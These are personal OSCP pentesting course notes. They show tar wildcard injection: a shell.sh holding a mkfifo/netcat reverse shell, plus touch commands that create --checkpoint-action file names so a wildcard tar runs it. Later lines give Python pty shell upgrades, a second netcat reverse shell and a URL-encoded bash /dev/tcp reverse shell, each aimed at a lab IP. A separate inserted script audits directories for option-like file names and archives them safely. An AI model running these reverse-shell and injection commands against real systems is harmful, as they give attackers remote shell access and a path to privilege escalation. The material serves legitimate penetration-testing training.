The following are notes from my pentesting course for OSCP.
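If an app runs tar with a wildcard (tar *), you can do the following. The shell expands * to the file names in the directory, and tar treats any name that starts with - as an option:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.218.104 4444 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"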
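The defensive side of the tar wildcard notes above, as an added example that is not part of the original notes: a check that flags option-like file names in a directory a wildcard tar job archives, and a tar call that cannot parse file names as options. The function names are made up for this example, and the demo directory is constructed.

```shell
#!/bin/sh
# Added example, not from the original notes. Function names are made up here.

# List entries of directory $1 whose names begin with "-". After the shell
# expands `tar cf x.tar *`, tar receives these names as options, not files.
find_option_like_names() {
    for path in "$1"/-*; do
        # An unmatched glob stays literal; skip it.
        [ -e "$path" ] || [ -L "$path" ] || continue
        printf '%s\n' "${path##*/}"
    done
}

# Return 1 and report on stderr if directory $1 holds option-like names.
# Usable as a pre-flight check in a backup job or a file-integrity sweep.
audit_dir() {
    hits=$(find_option_like_names "$1")
    [ -z "$hits" ] && return 0
    printf 'option-like names in %s:\n%s\n' "$1" "$hits" >&2
    return 1
}

# Hardened replacement for `cd DIR && tar cf OUT *`: every operand gets a
# "./" prefix, so no name starts with "-" when tar parses its arguments.
# $2 must be an absolute path because the archive is written after the cd.
safe_archive() {
    ( cd "$1" && tar -cf "$2" ./* )
}

# Demo on a constructed directory: empty sample files, nothing is executed.
demo() {
    d=$(mktemp -d) || return 1
    : > "$d/index.html"
    : > "$d/--checkpoint=1"
    : > "$d/--checkpoint-action=exec=sh shell.sh"
    if audit_dir "$d"; then status=0; else status=1; fi
    rm -rf "$d"
    return "$status"
}

# Run the demo only when asked: sh audit.sh demo
if [ "${1:-}" = "demo" ]; then demo || true; fi
```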
Clean shell using Python on Linux
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Simple shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.35 443 >/tmp/f
# Bash Reverse Shell
bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.14/443+0>%261'%26host=
Further reading:
https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/